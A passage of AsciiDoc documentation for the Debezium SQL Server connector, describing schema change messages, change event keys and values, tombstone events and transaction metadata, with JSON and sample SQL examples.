a schema change event message includes the following elements:\n\n`databaseName`:: The name of the database to which the statements are applied.\nThe value of `databaseName` serves as the message key.\n`tableChanges`:: A structured representation of the entire table schema after the schema change.\nThe `tableChanges` field contains an array that includes entries for each column of the table.\nBecause the structured representation presents data in JSON or Avro format, consumers can easily read messages without first processing them through a DDL parser.\n\n[IMPORTANT]\n====\nWhen 
the connector is configured to capture a table, it stores the history of the table's schema changes not only in the schema change topic, but also in an internal database schema history topic.\nThe internal database schema history topic is for connector use only and it is not intended for direct use by consuming applications.\nEnsure that applications that require notifications about schema changes consume that information only from the schema change topic.\n====\n\n[WARNING]\n====\nThe format of the messages that a connector emits to its schema change topic is in an incubating state and can change without notice.\n====\n\n{prodname} emits a message to the schema change topic when the following events occur:\n\n* You enable CDC for a table.\n* You disable CDC for a table.\n* You alter the structure of a table for which CDC is enabled by following the xref:{link-sqlserver-connector}#sqlserver-schema-evolution[schema evolution procedure].\n\n.Example: Message emitted to the SQL Server connector schema change topic\nThe following example shows a message in the schema change topic.\nThe message contains a logical representation of the table schema.\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n ...\n },\n \"payload\": {\n \"source\": {\n \"version\": \"{debezium-version}\",\n \"connector\": \"sqlserver\",\n \"name\": \"server1\",\n \"ts_ms\": 0,\n \"snapshot\": \"true\",\n \"db\": \"testDB\",\n \"schema\": \"dbo\",\n \"table\": \"customers\",\n \"change_lsn\": null,\n \"commit_lsn\": \"00000025:00000d98:00a2\",\n \"event_serial_no\": null\n },\n \"ts_ms\": 1588252618953, \/\/ <1>\n \"databaseName\": \"testDB\", \/\/ <2>\n \"schemaName\": \"dbo\",\n \"ddl\": null, \/\/ <3>\n \"tableChanges\": [ \/\/ <4>\n {\n \"type\": \"CREATE\", \/\/ <5>\n \"id\": \"\\\"testDB\\\".\\\"dbo\\\".\\\"customers\\\"\", \/\/ <6>\n \"table\": { \/\/ <7>\n \"defaultCharsetName\": null,\n \"primaryKeyColumnNames\": [ \/\/ <8>\n \"id\"\n ],\n \"columns\": [ \/\/ <9>\n {\n \"name\": \"id\",\n \"jdbcType\": 4,\n \"nativeType\": null,\n \"typeName\": \"int identity\",\n \"typeExpression\": \"int identity\",\n \"charsetName\": null,\n \"length\": 10,\n \"scale\": 0,\n \"position\": 1,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"first_name\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 2,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"last_name\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 3,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"email\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 4,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n }\n ],\n \"attributes\": [ \/\/ <10>\n {\n \"customAttribute\": \"attributeValue\"\n }\n ]\n }\n }\n ]\n }\n}\n----\n\n.Descriptions of fields in messages emitted to the schema change topic\n[cols=\"1,4,5\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`ts_ms`\n|Optional field that displays the time at which the connector processed the 
event. The time is based on the system clock in the JVM running the Kafka Connect task.\n\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|2\n|`databaseName` +\n`schemaName`\n|Identifies the database and the schema that contain the change.\n\n|3\n|`ddl`\n|Always `null` for the SQL Server connector.\nFor other connectors, this field contains the DDL responsible for the schema change.\nThis DDL is not available to SQL Server connectors.\n\n|4\n|`tableChanges`\n|An array of one or more items that contain the schema changes generated by a DDL command.\n\n|5\n|`type`\na|Describes the kind of change. The value is one of the following:\n\n* `CREATE` - table created\n* `ALTER` - table modified\n* `DROP` - table deleted\n\n|6\n|`id`\n|Full identifier of the table that was created, altered, or dropped.\n\n|7\n|`table`\n|Represents table metadata after the applied change.\n\n|8\n|`primaryKeyColumnNames`\n|List of columns that compose the table's primary key.\n\n|9\n|`columns`\n|Metadata for each column in the changed table.\n\n|10\n|`attributes`\n|Custom attribute metadata for each table change.\n\n|===\n\nIn messages that the connector sends to the schema change topic, the key is the name of the database that contains the schema change.\nIn the following example, the `payload` field contains the key:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"databaseName\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.sqlserver.SchemaChangeKey\"\n },\n \"payload\": {\n \"databaseName\": \"testDB\"\n }\n}\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-sql-server-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} SQL Server connector data change events\n=== Data change events\n\nThe {prodname} SQL Server connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed.\n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained.\n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. 
If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure:\n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/ <1>\n ...\n },\n \"payload\": { \/\/ <2>\n ...\n },\n \"schema\": { \/\/ <3>\n ...\n },\n \"payload\": { \/\/ <4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the unique key if the table does not have a primary key, for the table that was changed. +\n +\nIt is possible to override the table's primary key by setting the xref:{link-sqlserver-connector}#sqlserver-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the key identified by that property.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed.\n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas.\n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\nBy default, the connector streams change event records to topics with names that are the same as the event's originating table. See xref:{link-sqlserver-connector}#sqlserver-topic-names[topic names].\n\n[WARNING]\n====\nThe SQL Server connector ensures that all Kafka Connect schema names adhere to the link:http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. Each remaining character in the logical server name and each character in the database and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a database name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n====\n\nifdef::product[]\n\nFor details about change events, see the following topics:\n\n* xref:about-keys-in-debezium-sql-server-change-events[]\n* xref:about-values-in-debezium-sql-server-change-events[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-sql-server-change-events\n\/\/ Title: About keys in {prodname} SQL Server change events\n[[sqlserver-change-event-keys]]\n==== Change event keys\n\nA change event's key contains the schema for the changed table's key and the changed row's actual key. 
Both the schema and its corresponding payload contain a field for each column in the changed table's primary key (or unique key constraint) at the time the connector created the event.\n\nConsider the following `customers` table, which is followed by an example of a change event key for this table.\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n id INTEGER IDENTITY(1001,1) NOT NULL PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE\n);\n----\n\n.Example change event key\nEvery change event that captures a change to the `customers` table has the same event key schema. For as long as the `customers` table has the previous definition, every change event that captures a change to the `customers` table has the following key structure, which, in JSON, looks like this:\n\n[source,json,indent=0]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [ \/\/ <2>\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n }\n ],\n \"optional\": false, \/\/ <3>\n \"name\": \"server1.testDB.dbo.customers.Key\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"id\": 1004\n }\n}\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion.\n\n|2\n|`fields`\n|Specifies each field that is expected in the `payload`, including each field's name, type, and whether it is required. In this example, there is one required field named `id` of type `int32`.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`server1.testDB.dbo.customers.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._database-name_._schema-name_._table-name_.`Key`. In this example: +\n\n* `server1` is the name of the connector that generated this event. +\n* `testDB` is the database that contains the table that was changed. +\n* `dbo` is the database schema for the table that was changed. +\n* `customers` is the table that was updated.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key contains a single `id` field whose value is `1004`.\n\n|===\n\nifdef::community[]\n[NOTE]\n====\nAlthough the `column.exclude.list` and `column.include.list` connector configuration properties allow you to capture only a subset of table columns, all columns in a primary or unique key are always included in the event's key.\n====\n\n[WARNING]\n====\nIf the table does not have a primary or unique key, then the change event's key is null. This makes sense since the rows in a table without a primary or unique key constraint cannot be uniquely identified.\n====\nendif::community[]
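\n\nFor example, given the `customers` table above, and assuming that three rows were inserted previously (so that the `IDENTITY(1001,1)` column has reached `1004`), a hypothetical insert such as the following produces a change event whose key payload is `{\"id\": 1004}`:\n\n[source,sql]\n----\n-- Illustrative data; the IDENTITY column assigns id = 1004 to the fourth row.\nINSERT INTO customers (first_name, last_name, email)\nVALUES ('Anne', 'Kretchmar', 'annek@noanswer.org');\n----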
\n\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-sql-server-change-events\n\/\/ Title: About values in {prodname} SQL Server change events\n[[sqlserver-change-event-values]]\n==== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update, or delete data all have a value payload with an envelope structure.\n\nConsider the same sample table that was used to show an example of a change event key:\n\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n id INTEGER IDENTITY(1001,1) NOT NULL PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE\n);\n----\n\nThe value portion of a change event for a change to this table is described for each event type.\n\nifdef::product[]\n\n* <<sqlserver-create-events,_create_ events>>\n* <<sqlserver-update-events,_update_ events>>\n* <<sqlserver-delete-events,_delete_ events>>\n\nendif::product[]\n\n[[sqlserver-create-events]]\n===== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"server1.testDB.dbo.customers.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"server1.testDB.dbo.customers.Value\",\n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_ms\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"schema\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"table\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"change_lsn\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"commit_lsn\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"event_serial_no\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.sqlserver.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"server1.testDB.dbo.customers.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"before\": null, \/\/ <6>\n \"after\": { \/\/ <7>\n \"id\": 
1005,\n \"first_name\": \"john\",\n \"last_name\": \"doe\",\n \"email\": \"john.doe@example.org\"\n },\n \"source\": { \/\/ <8>\n \"version\": \"{debezium-version}\",\n \"connector\": \"sqlserver\",\n \"name\": \"server1\",\n \"ts_ms\": 1559729468470,\n \"snapshot\": false,\n \"db\": \"testDB\",\n \"schema\": \"dbo\",\n \"table\": \"customers\",\n \"change_lsn\": \"00000027:00000758:0003\",\n \"commit_lsn\": \"00000027:00000758:0005\",\n \"event_serial_no\": \"1\"\n },\n \"op\": \"c\", \/\/ <9>\n \"ts_ms\": 1559729471739 \/\/ <10>\n }\n}\n----\n\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table.\n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`server1.testDB.dbo.customers.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table. +\n +\n Names of schemas for `before` and `after` fields are of the form `_logicalName_._databaseName_._schemaName_._tableName_.Value`, which ensures that the schema name is unique in the database.\n This means that when using the xref:{link-avro-serialization}#avro-serialization[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\n\n|3\n|`name`\na|`io.debezium.connector.sqlserver.Source` is the schema for the payload's `source` field. This schema is specific to the SQL Server connector. The connector uses it for all events that it generates.\n\n|4\n|`name`\na|`server1.testDB.dbo.customers.Envelope` is the schema for the overall structure of the payload, where `server1` is the connector name, `testDB` is the database name, `dbo` is the database schema name, and `customers` is the table.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that the JSON representations of the events are much larger than the rows they describe. This is because the JSON representation must include the schema and the payload portions of the message.\nHowever, by using the xref:{link-avro-serialization}#avro-serialization[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`before`\n|An optional field that specifies the state of the row before the event occurred. When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content.\n\n|7\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `id`, `first_name`, `last_name`, and `email` columns.\n\n|8\n|`source`\na|Mandatory field that describes the source metadata for the event. This field contains information that you can use to compare this event with other events, with regard to the origin of the events, the order in which the events occurred, and whether events were part of the same transaction. 
The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Database and schema names\n* Timestamp for when the change was made in the database\n* If the event was part of a snapshot\n* Name of the table that contains the new row\n* Server log offsets\n\n|9\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are:\n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies to only snapshots)\n\n|10\n|`ts_ms`\na| Optional field that displays the time at which the connector processed the event.\nIn the event message envelope, the time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time when a change was committed in the database.\nBy comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[[sqlserver-update-events]]\n===== _update_ events\n\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1005,\n \"first_name\": \"john\",\n \"last_name\": \"doe\",\n \"email\": \"john.doe@example.org\"\n },\n \"after\": { \/\/ <2>\n \"id\": 1005,\n \"first_name\": \"john\",\n \"last_name\": \"doe\",\n \"email\": \"noreply@example.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"sqlserver\",\n \"name\": \"server1\",\n \"ts_ms\": 1559729995937,\n \"snapshot\": false,\n \"db\": \"testDB\",\n \"schema\": \"dbo\",\n \"table\": \"customers\",\n \"change_lsn\": \"00000027:00000ac0:0002\",\n \"commit_lsn\": \"00000027:00000ac0:0007\",\n \"event_serial_no\": \"2\"\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1559729998706 \/\/ <5>\n }\n}\n----\n\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|An optional field that specifies the state of the row before the event occurred. In an _update_ event value, the `before` field contains a field for each table column and the value that was in that column before the database commit. In this example, the `email` value is `john.doe@example.org.`\n\n|2\n|`after`\n| An optional field that specifies the state of the row after the event occurred. You can compare the `before` and `after` structures to determine what the update to this row was. In the example, the `email` value is now `noreply@example.org`.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure has the same fields as in a _create_ event, but some values are different, for example, the sample _update_ event has a different offset. 
The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Database and schema names\n* Timestamp for when the change was made in the database\n* If the event was part of a snapshot\n* Name of the table that contains the new row\n* Server log offsets\n\nThe `event_serial_no` field differentiates events that have the same commit and change LSN. Typical situations for when this field has a value other than `1`:\n\n* _update_ events have the value set to `2` because the update generates two events in the CDC change table of SQL Server (link:https:\/\/docs.microsoft.com\/en-us\/sql\/relational-databases\/system-tables\/cdc-capture-instance-ct-transact-sql?view=sql-server-2017[see the source documentation for details]). The first event contains the old values and the second contains the new values. The connector uses the values in the first event to create the second event, and then drops the first event.\n\n* When a primary key is updated, SQL Server emits two events: a _delete_ event for the removal of the record with the old primary key value, and a _create_ event for the addition of the record with the new primary key.\nBoth operations share the same commit and change LSN and their event numbers are `1` and `2`, respectively.\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|5\n|`ts_ms`\na| Optional field that displays the time at which the connector processed the event.\nIn the event message envelope, the time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time when the change was committed to the database.\nBy comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===
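\n\nFor reference, an _update_ event like the example above could result from a statement such as the following sketch; the table and values match the example payloads, but the statement itself is only illustrative:\n\n[source,sql]\n----\n-- Produces an update event whose before.email is 'john.doe@example.org'\n-- and whose after.email is 'noreply@example.org'.\nUPDATE customers\nSET email = 'noreply@example.org'\nWHERE id = 1005;\n----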
\n\n[NOTE]\n====\nUpdating the columns for a row's primary\/unique key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a _delete_ event and a xref:{link-sqlserver-connector}#sqlserver-tombstone-events[tombstone event] with the old key for the row, followed by a _create_ event with the new key for the row.\n====\n\n[[sqlserver-delete-events]]\n===== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The `payload` portion in a _delete_ event for the sample `customers` table looks like this:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1005,\n \"first_name\": \"john\",\n \"last_name\": \"doe\",\n \"email\": \"noreply@example.org\"\n },\n \"after\": null, \/\/ <2>\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"sqlserver\",\n \"name\": \"server1\",\n \"ts_ms\": 1559730445243,\n \"snapshot\": false,\n \"db\": \"testDB\",\n \"schema\": \"dbo\",\n \"table\": \"customers\",\n \"change_lsn\": \"00000027:00000db0:0005\",\n \"commit_lsn\": \"00000027:00000db0:0007\",\n \"event_serial_no\": \"1\"\n },\n \"op\": \"d\", \/\/ <4>\n \"ts_ms\": 1559730450205 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit.\n\n|2\n|`after`\n| Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms`, `change_lsn`, and `commit_lsn` field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata:\n\n* {prodname} version\n* Connector type and name\n* Database and schema names\n* Timestamp for when the change was made in the database\n* If the event was part of a snapshot\n* Name of the table that contains the new row\n* Server log offsets\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na| Optional field that displays the time at which the connector processed the event.\nIn the event message envelope, the time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database.\nBy comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\nSQL Server connector events are designed to work with link:{link-kafka-docs}\/#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n[[sqlserver-tombstone-events]]\n.Tombstone events\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, after the {prodname} SQL Server connector emits a _delete_ event, the connector emits a special tombstone event that has the same key but a `null` value.
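\n\nFor instance, a delete such as the following illustrative statement causes the connector to emit the _delete_ event shown above, followed by a tombstone message with the same key and a `null` value:\n\n[source,sql]\n----\n-- Emits a delete event for the row, followed by a tombstone message\n-- with the same key (id = 1005) and a null value.\nDELETE FROM customers\nWHERE id = 1005;\n----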
\n\n\/\/ Type: assembly\n\/\/ ModuleID: debezium-sql-server-connector-generated-events-that-represent-transaction-boundaries\n\/\/ Title: {prodname} SQL Server connector-generated events that represent transaction boundaries\n[[sqlserver-transaction-metadata]]\n=== Transaction metadata\n\n{prodname} can generate events that represent transaction boundaries and that enrich data change event messages.\n\n[NOTE]\n.Limits on when {prodname} receives transaction metadata\n====\n{prodname} registers and receives metadata only for transactions that occur after you deploy the connector.\nMetadata for transactions that occur before you deploy the connector is not available.\n====\n\nDatabase transactions are represented by a statement block that is enclosed between the `BEGIN` and `END` keywords.\n{prodname} generates transaction boundary events for the `BEGIN` and `END` delimiters in every transaction.\nTransaction boundary events contain the following fields:\n\n`status`:: `BEGIN` or `END`.\n`id`:: String representation of the unique transaction identifier.\n`ts_ms`:: The time of a transaction boundary event (`BEGIN` or `END` event) at the data source.\nIf the data source does not provide {prodname} with the event time, then the field instead represents the time at which {prodname} processes the event.\n`event_count` (for `END` events):: Total number of events emitted by the transaction.\n`data_collections` (for `END` events):: An array of pairs of `data_collection` and `event_count` elements that indicates the number of events that the connector emits for changes that originate from a data collection.\n\n[WARNING]\n====\nThere is no way for {prodname} to reliably identify when a transaction has ended.\nThe transaction `END` marker is thus emitted only after the first event of another transaction arrives.\nThis can lead to the delayed delivery of the `END` marker in the case of a low-traffic system.\n====\n\nThe following example shows a typical transaction boundary message:\n\n.Example: SQL Server connector transaction boundary event\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"status\": \"BEGIN\",\n \"id\": \"00000025:00000d08:0025\",\n \"ts_ms\": 1486500577125,\n \"event_count\": null,\n \"data_collections\": null\n}\n\n{\n \"status\": \"END\",\n \"id\": \"00000025:00000d08:0025\",\n \"ts_ms\": 1486500577691,\n \"event_count\": 2,\n \"data_collections\": [\n {\n \"data_collection\": \"testDB.dbo.tablea\",\n \"event_count\": 1\n },\n {\n \"data_collection\": \"testDB.dbo.tableb\",\n \"event_count\": 1\n }\n ]\n}\n----
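\n\nA boundary pair like the one above could result from a transaction such as the following sketch, assuming hypothetical CDC-enabled tables `dbo.tablea` and `dbo.tableb` that receive one change each; the statements and values are illustrative only:\n\n[source,sql]\n----\nBEGIN TRANSACTION;\nINSERT INTO tablea (pk, aa) VALUES (2, 1); -- one event for testDB.dbo.tablea\nINSERT INTO tableb (pk, bb) VALUES (2, 1); -- one event for testDB.dbo.tableb\nCOMMIT;\n-- The END event, with event_count = 2, is emitted only after the first\n-- event of a subsequent transaction arrives, as noted in the warning above.\n----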
\n\nUnless overridden via the xref:sqlserver-property-topic-transaction[`topic.transaction`] option,\ntransaction events are written to the topic named xref:sqlserver-property-topic-prefix[`_<topic.prefix>_`]`.transaction`.\n\n\/\/Type: concept\n\/\/ModuleID: change-data-event-enrichment\n==== Change data event enrichment\n\nWhen transaction metadata is enabled, the data message `Envelope` is enriched with a new `transaction` field.\nThis field provides information about every event in the form of a composite of fields:\n\n`id`:: String representation of the unique transaction identifier.\n`total_order`:: The absolute position of the event among all events generated by the transaction.\n`data_collection_order`:: The per-data collection position of the event among all events that were emitted by the transaction.\n\nThe following example shows what a typical message looks like:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"before\": null,\n \"after\": {\n \"pk\": \"2\",\n \"aa\": \"1\"\n },\n \"source\": {\n...\n },\n \"op\": \"c\",\n \"ts_ms\": \"1580390884335\",\n \"transaction\": {\n \"id\": \"00000025:00000d08:0025\",\n \"total_order\": \"1\",\n \"data_collection_order\": \"1\"\n }\n}\n----\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-sql-server-connectors-map-data-types\n\/\/ Title: How {prodname} SQL Server connectors map data types\n[[sqlserver-data-types]]\n=== Data type mappings\n\nThe {prodname} SQL Server connector represents changes to table row data by producing events that are structured like the table in which the row exists.\nEach event contains fields to represent the column values for the row.\nThe way in which an event represents the column values for an operation depends on the SQL data type of the column.\nIn the event, the connector maps the fields for each SQL Server data type to both a _literal type_ and a _semantic type_.\n\nLiteral type:: Describes how the value is literally represented by using Kafka Connect schema types, namely `INT8`, `INT16`, `INT32`, `INT64`, `FLOAT32`, `FLOAT64`, `BOOLEAN`, `STRING`, `BYTES`, `ARRAY`, `MAP`, and `STRUCT`.\nSemantic type:: Describes how the Kafka Connect schema captures the _meaning_ of the field using the name of the Kafka Connect schema for the field.\n\nIf the default data type conversions do not meet your needs, you can {link-prefix}:{link-custom-converters}#custom-converters[create a custom converter] for the connector.\n\nifdef::product[]\n\nFor more information about data type mappings, see the following sections:\n\n* xref:sql-server-basic-values[]\n* xref:sql-server-temporal-values[]\n* xref:sql-server-decimal-values[]\n* xref:sql-server-timestamp-values[]\n\nendif::product[]\n\n[id=\"sql-server-basic-values\"]\n==== Basic types\n\nThe following table shows how the connector maps basic SQL Server data types.\n\n.Data type mappings used by the SQL 